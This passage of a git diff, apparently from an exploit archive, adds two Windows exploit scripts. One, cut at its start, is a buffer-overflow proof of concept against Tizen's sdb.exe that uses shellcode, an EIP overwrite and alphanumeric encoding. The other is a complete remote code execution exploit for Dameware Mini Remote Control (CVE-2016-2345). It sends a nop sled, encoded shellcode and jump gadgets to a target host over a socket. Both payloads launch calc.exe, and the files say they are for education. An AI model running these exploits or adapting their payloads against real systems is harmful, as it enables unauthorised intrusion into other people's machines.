"\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a" + buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02" + buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0" + buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36" + buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9" + buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18" + buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c" + buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1" + buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75" + buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d" + buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52" + buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72" + buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e" + buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59" + buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04" + buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69" + + stack_adj = "\x83\xEC\x7F" * 2 # SUB ESP,0x7F - stack adjustment + sc = stack_adj + buf + + eip = "\x01\xed\x8b" # 008BED01 - 3 byte EIP overwrite + payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip + + print "Trying to exploit the binary... " + print "Payload length: " + str(len(payload)) + print sdb_path + ARGS + payload + + subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE) + + +def tech_social_ascii(sdb_path, jmp_esp_addr): + eip = struct.pack(' + +Demonstrated Exploitation Techniques: +1: Direct execution, 3-byte EIP overwrite, Stack adjustment +2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode +3: Bonus exercise - source code analysis + +This code has been created for educational purposes only, to raise awareness on software security, and it's harmless +by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious + +Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP] +Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe + python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557 + python sdbBOpoc.py 3""" + + +def main(): + if len(sys.argv) > 1: + if int(sys.argv[1]) == 1: + if len(sys.argv) == 3: + tech_direct_exec(sys.argv[2]) + if int(sys.argv[1]) == 2: + if len(sys.argv) == 4: + tech_social_ascii(sys.argv[2], sys.argv[3]) + if int(sys.argv[1]) == 3: + bonus_exercise() + else: + usage() + + +if __name__ == '__main__': + main() diff --git a/platforms/windows/remote/43059.py b/platforms/windows/remote/43059.py new file mode 100755 index 000000000..d23f4cbb9 --- /dev/null +++ b/platforms/windows/remote/43059.py @@ -0,0 +1,79 @@ +# Exploit Title: Dameware Remote Controller RCE +# Date: 3-04-2016 +# Exploit Author: Securifera +# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx +# Version: 12.0.0.520 +# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/ +# CVE : CVE-2016-2345 + +import socket +import sys +import os +import time +import struct +import binascii +import random + +# windows/exec - 220 bytes +# http://www.metasploit.com +# Encoder: x86/shikata_ga_nai +# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, +# CMD=calc.exe +sc = "" +sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29" +sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a" +sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab" +sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c" +sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee" +sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde" +sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81" +sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28" +sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9" +sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65" +sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04" +sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5" +sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a" +sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e" +sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2" +sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8" +sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a" + +port = 6129 + +if len (sys.argv) == 2: + (progname, host ) = sys.argv +else: + print len (sys.argv) + print 'Usage: {0} host'.format (sys.argv[0]) + exit (1) + +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +type = 444.0 +buf = struct.pack("I", 4400 ) #Init Version +buf += "\xcc"*4 +buf += struct.pack("d", type) #Minor Version +buf += struct.pack("d", type) #Minor Version +buf += (40 - len(buf)) * "C" +csock.send(buf) + +wstr = "\x90" * 0x10 #nop sled +wstr += sc #calc shellcode +wstr += "\x90" * (0x2ac - 0x10 - len(sc)) +wstr += "\xeb\x06\xff\xff" #short jump forward +wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget +wstr += "\x90" * 3 #nop +wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode +wstr += "E" * 0xbc +wstr += ("%" + "\x00" + "c" + "\x00")*5 + +buf = struct.pack("I", 0x9c44) #msg type +buf += wstr #payload +buf += "\x00" * (0x200) #null bytes +csock.send(buf) + +print binascii.hexlify(csock.recv(0x4000)) #necessary reads +print binascii.hexlify(csock.recv(0x4000)) + +csock.close()